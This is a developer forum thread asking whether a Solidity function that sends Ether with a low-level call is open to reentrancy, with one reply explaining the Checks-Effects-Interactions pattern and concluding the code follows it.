Solidity.

Beitrag

Teile dein Wissen.

Serpent0x.
May 31, 2024
Diskussion

Reentrancy Vulnerability

Hello everyone , I've noticed that the offer function uses the .call{value: amount}("") method to send Ether to the recipient's address.

Could anyone provide insight into whether this function is indeed vulnerable to reentrancy and suggest any best practices or modifications to mitigate such risks?

function _offer(address to, uint256 amount) internal {

      balance -= amount;

      (bool success, ) = to.call{value: amount}("");
      if (!success) {
          revert TransferFailed(address(0), address(this), to, amount);
      }
  }
  • Smart Contract
  • Solidity
  • Solidity Compiler
0
1
Teilen
Kommentare
.

Antworten

1
0x0304...a958.
Aug 11 2024, 15:15

One of the best practice in Solidity is CEI (Checks, Effects, Interactions). It describes the order of how your code is structured to avoid unexpected behaviour or malicious execution.

Checks would be implementing some require to be sure the parameters in your function are correct. There isn't any in your _offer() function, but you could add for exemple require(balance >= amount); (not necessary) at the beginning of your function to be sure that the user doesn't spend more than what he owns.

Effects are basically changing the state variables of your contract in order to suit what you want it to be now. Here, it's the line balance -= amount;, reducing the users balance.

Interactions are calls to other contracts/addresses that might trigger some unknown code (for exemple when you call to send money, it might trigger a receive() function of the smart contract calling your function).

Because you follow this rule in this code, no re-entrancy should be possible.

0
Kommentare
.

Weißt du die Antwort?

Bitte melde dich an und teile sie.

Wir verwenden Cookies, um sicherzustellen, dass Sie die beste Erfahrung auf unserer Website haben.
Mehr Infos